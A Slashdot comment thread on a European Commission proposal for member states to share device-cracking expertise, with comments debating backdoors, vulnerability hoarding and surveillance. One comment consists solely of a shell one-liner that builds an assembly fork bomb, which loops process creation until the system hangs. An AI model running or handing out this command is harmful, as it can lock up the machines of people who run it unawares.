Slashdot Mirror
EU: No Encryption Backdoors But, Let's Help Each Other Crack That Crypto (theregister.co.uk)
The European Commission has proposed that member states help each other break into encrypted devices by sharing expertise around the bloc. From a report: In an attempt to tackle the rise of citizens using encryption and its effects on solving crimes, the commission decided to sidestep the well-worn, and well-ridiculed, path of demanding decryption backdoors in the stuff we all use. Instead, the plans set out in its antiterrorism measures on Wednesday take a more collegiate approach -- by offering member states more support when they actually get their hands on an encrypted device. "The commission's position is very clear -- we are not in favour of so-called backdoors, the utilisation of systemic vulnerabilities, because it weakens the overall security of our cyberspace, which we rely upon," security commissioner Julian King told a press briefing. "We're trying to move beyond a sometimes sterile debate between backdoors or no backdoors, and address some of the concrete law enforcement challenges. For instance, when [a member state] gets a device, how do they get information that might be encrypted on the device." [...] Share the wealth. "Some member states are more equipped technically to do that [extract information from a seized device] than others," King said. "We want to make sure no member state is at a disadvantage, by sharing the tech expertise among the member states and reinforcing the support that Europol can offer."
So we have a device of someone that we suspect to be a criminal, now aid us to access it.
That is something we can actually work with. Provided there is oversight and it's not "we probably have (population count) terrorists in our country, let's find out how to up the surveillance so we can track them all!"
We used to have a Bill of Rights. Now, with the rights gone, all we have left is the bill.
If any member state has that capability, there is no way in hell they'll share it. That is of utmost importance to national security and is most likely top secret. That's not stuff you share, ever.
If the second part is the solution against encryption, I'm sorry, we have bigger problems. As a matter of fact, if they think that is the solution they really don't understand the problem.
"We don't know, but we should share". It's grasping at straws, really
Ahhh...the great dumpster continuum. Many a free computer will be found there. -- sowth (748135)
The irony here is that even if they put a gun to everyones heads and forced them to ruin encryptions' value by compromising it with 'backdoors' (that anyone would eventually be able to discover and leverage) criminals and terrorists would not just use non-compromised encryption (copied from before the ban on 'real' encryption), they'd use codebooks and other types of obfuscation (book ciphers, and so on; the list is endless) that have been used for much longer than we've had computers, and goverments and cops would be back at Square One again: needing to do REAL police work, not just be jackbooted thugs with guns forcing their will on everyone. Are they really so blind to all this, or is it just another power-grab?
Every CPU since 2006 has backdoors built in, they don't need to have backdoors in individual protocols. If they have cyber-backdoor agreements with the nation manufacturing the chips they have a backdoor.
What does this have to do with Germany specifically?
The more encryption is challenged, the better it is. And with so many people involved, somebody with blabber if it has been hacked and better encryption can be found.
I think we should tell them that all Linux and other OSS software is involved. Having "free" peer review would be great.
Don't fight for your country, if your country does not fight for you.
Or have they just struck a secret deal somewhere?
Let's hope the first. Being a big fan of EU (the idea) and sometimes utterly revolted by EU (the implementation), this makes my week.
Do share all your cracking and hacking tricks. Publicly.
so we can patch the vulns
They want you, out of fear, to put your files in the cloud. Note the careful wording in regards to possessing a physical object of the suspect. They can scrap a server, permission or not, and find your nefarious activities much easier than they ever could by taking possession of a computer or burner phone, especially in the UK. Keeping files local is currently the lesser of the two evils. We've got AI now and more going on in a server than any sane human should trust with personal files. Just stop hoarding every damn thing and clear your caches. You don't even need Google to store your email; that's what POP3 is for; Your email is downloaded to you and deleted off of the server, all be it still possible for the administrator to keep email for a period of time depending on the service. Ironically, if criminals were to go old school again, aka no internet, half of our "modern" forensics technology would be useless.
Who bankrolls the EU now that Britain is out?
I'll give you a hint: it's not Spain
why not publish all those vulnerabilities they're using to decrypt devices (after a suitable period of time given to the manufacturer to fix the defect)? Could it be they don't really care about security in our shared cyberspace? Naw, they could never be so callous.
Hi! I make Firefox Plug-ins. Check 'em out @ https://addons.mozilla.org/en-US/firefox/addon/youtube-mp3-podcaster/
enough said
Is when the encryption wars began. The war was long and had many casualties. After many years of trying to crack encryption most governments around the world agreed to make encryption used by anyone other than the government illegal.
What does this have to do with Germany specifically?
Read his name and you know why.
Even as far back as 9/11, the terror-ista crowd did not use cell phones. No, folks, this is for spying on political dissidents like us.
That's exactly the approach the NSA took (hoarding zero days) and that worked out so well. https://www.cyberscoop.com/nsa-hacking-tools-shadow-brokers-dark-web-microsoft-smb/
Weakening encryption is bad. Trying to break encryption is expected.
Exactly.
It's very obvious what the Marxists in the EU want to do, and it isn't about "fighting" common criminals.
http://www.zerohedge.com/news/...
It is about muzzling the ordinary citizens who want to speak out against the immigration and political policies of the PES (Party of European Socialists, i.e., the Marxists) who currently rule the country under various pseudonyms.
https://www.nytimes.com/2014/0...
Increasingly, people are resorting to VPNs, Tor and anonymous email accounts to register, browse and post their opinions on line because they know, as China, Russia and the EU has repeatedly proven, that speaking the truth against the EU's new-speak can land them in jail. They are also resorting to end-to-end encryption to send messages and to keep their personal business just that ... personal.
The American political environment is progressing toward the George Orwell 1984 state as well, with Twitter, Google, Youtube and the MNM censoring comments from half the political spectrum.
Most of those under 25 are too young to remember when the Left in America pushed the V-chip as a means of controlling what people could watch on American TV. The trial run was blocking "unsuitable" content on children's programming, but if it can block one type of program, and it could, then it could be used to block any type of program, depending on who was in power. TV sets made as recently as 10-15 years ago had a V-chip in them and YouTube is filled with videos showing how to deactivate them. What killed the V-chip was the Internet.
Over the years, various technologies have been explored with the goal to enable authorities to identify the owner of a particular IP address present in a series of IP packets. Microsoft, with its GUID, and its extensive registration database combined with credit card information from point of sale transactions, had the ability to identify connection ownership and China used Microsoft more than once to identify dissidents, in exchange for the "privilege" of doing business in China. However, not everyone used Windows, so Microsoft's power was limited.
The powers that be will, sooner or later, return to a form of the "v-chip" by requiring that ISPs tag each IP packet with a special code identifying the sender of that packet. It will be easier with IPv6 because each device can be assigned its own IP address. Then it won't matter which OS, browser, or even encryption that you use. Your "fingerprint" will be on every IP packet that you send and every packet that you receive will contain the special code of the source of packets sent to you. Even P2P networks and meshes won't stop that monitoring as long as people have to go through central ISP severs to connect to the Internet. When that happens dissidents will return to radio frequency networks and to what the Berkeley campus dissidents in the 1960s used to coordinate protests -- "underground radio". I leave it as an exercise for the reader to discover what "underground" means in that context.
Running with Linux for over 20 years!
Encryption weenies place a lot more faith in it's power than I do. So, are we supposed to trust SSL? I don't. Besides being eat-up with a laundry list of past vulnerabilities, I'm supposed to trust some megacorp that says some other megacorp or boiler-room-scam operation capable of issuing a certificate signing request is trustworthy? Why again? Just because they can pay folks to answer the phone or to supposedly check someone's business license? That doesn't mean *squat*. There are so many instances where that system has broken down due to technical and logistical reasons, it's not even funny.
You ever notice how everyone gets all concerned about algorithms being broken but it's usually the implementation that the hackers go after and break? What difference does it make if you have a steel vault door if it's mounted on a balsa wood frame? So, because of that fact, how is anyone supposed to trust anything that's "encrypted" ? You can't trust the OS to not be keylogging you, the feds or the author not to have backdoored the implementation, nor can you trust that someone won't simply beat the password out of user (ie.. rubber hose decryption method). If you ask me, the promise of encryption is a lie. It's marginally useful to obfuscate sensitive details in transit or for hashing. The idea that it can always be trusted and is some kind of panacea against hacking is laughable and been proven idiotic over and over, especially when pronounced upon high by evil megacorporations who have ZERO credibility anymore.
Hey thats so well encrypted I cannot read it.
You don't. If you could, the encryption would be pointless.
For instance, when [a member state] gets a device, how do they get information that might be encrypted on the device." [...] Share the wealth. "Some member states are more equipped technically to do that [extract information from a seized device] than others," King said. "We want to make sure no member state is at a disadvantage, by sharing the tech expertise among the member states and reinforcing the support that Europol can offer."
I think they're worried about the Five Eyes countries sharing information with each other, but not with EU countries
https://en.wikipedia.org/wiki/...
One of the interesting contradictions of the UK being a member of the EU was that it always had much better intelligence sharing with the Five Eyes countries than it did with any EU country.
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;
Who bankrolls the EU now that Britain is out?
The same as before: not Britain.
One camp wants to lock you out from a hardware device that you bought/own and can hold in your own hands (DRM).
The other camp wants remote access to all your data any time (clubberment via all kinds of "child-saving-bomb-destroying-other-supression-reasons).
The solution would be to have a hardware backdoor on a device that you need physical access to to decrypt it.
Of course the success of semi conductor industry is because of the utter simplicity to mass manufacture.
thus the problem to having hardware backdoor that requires physical access and a physical key (device or dongle) is
that these are also utter simply to produce/manufacture.
This writer understands the right to NOT hand over a device to clubberment unless a solid legal warrant is presented but
also understands that law enforcement needs to be able to decipher data on the device ONCE in physical possession.
the same "right" would then apply to every owner of a physical device in his/her physical possession to "crack" any DRM trying to run on his/her device!
aren't members of the e.u. nor residents of one.
and no, israel won't help you either, unless you give them big huge "aid" packages.
First, often asking for something (backdoors) is cover for already having it. Second, pretending to not ask for it is cover for getting it without public scrutiny. Third, knowing of vulnerabilities and keeping them secret and exploiting them is ethically just as bad as having backdoors. You find it, you announce it, or you're hurting security for everyone. You think you're the only one that found it? Unlikely. Russians, Iranians, Pakistanis, and Israelis have found it but the only way to block their use of it is to inform the manufacturer and the public and get it plugged/fixed. It's not like they're going to tell you they found it.
These lousy bureaucrats are proving their incompetence to the world. Thankfully, between Brexit, Catalonian secession, and other decentralizing movements the EU will soon go the way of the Dodo. In the meantime, it is incumbent on all of us to encrypt, encrypt, encrypt and thereby undermine the police state.
...that's what it means when it says, "Some member states are more equipped technically to do that [extract information from a seized device] than others". Or maybe the UK using stuff they got from the NSA.
AC "Reminder: Spies, cops don't need to crack ... They'll just hack your smartphone" (26 Jul 2017) ..... , and instead simply hack devices to snoop on suspects"
"Police in Germany will forego seeking decryption keys for secure messaging apps,
AC governments are just going for the remote communication interception software (RCIS) solution to advanced end to end crypto.
Domestic spying is now "Benign Information Gathering"
As any serious cryptographer will tell you, it is really hard to get crypto right. Why else have law enforcement agencies only starting complaining since WhatsApp, Signal, etc, started doing E2E?
Without a doubt government agencies have been using real crypto for a long time but they get trained, have teams dedicated to developing best practices, etc.
Before that there was nothing stopping anyone developing their own app and using crypto ... but nobody did. And lets not forget that in order to have your own app crypto chat app means that you need to run your own server, etc.
You are accusing the EU of incompetence for stating that they are “not in favour of so-called backdoors, the utilisation of systemic vulnerabilities, because it weakens the overall security of our cyberspace, which we rely upon”, and at the same time you are praising Brexit, when Theresa May (and Cameron before her) as well as officials from other individual states (including France and Germany) have been advocating the mandatory use of backdoors. So I take it that you are a supporter of weak encryption.
The obvious problem is that it won’t stop high-calibre criminals (those used by governments to justify the need for backdoors) from using secure encryption, while putting everybody else at risk of exploitation by lower-calibre (but still tech-savvy) criminals. In the words of Matthew Green, cryptography professor at the Johns Hopkins University Information Security Institute): “There’s no chance whatsoever you’re going to stop people who really want to use encryption, like terrorists and serious criminals. That’s just impossible.” (Source: The parallax, “Could strong encryption and backdoors coexist? Nope, experts say”)
Isn't this just a backdoor by another name?
Yeah, not technically an encryption backdoor, but broken security is broken security. And if they promote ways of breaking into devices, those techniques will get out. It's inevitable. First it's the originator of the exploit. Then they share it with their department. Then they share it with other national level agencies. Then they share it across the EU. When the circle is large enough, hundreds (or thousands) know and they begin sharing 'with friends, only for you and as a special favour'.
The exploits are eventually widely known and distributed far beyond the authorized security agencies that the original intention covered.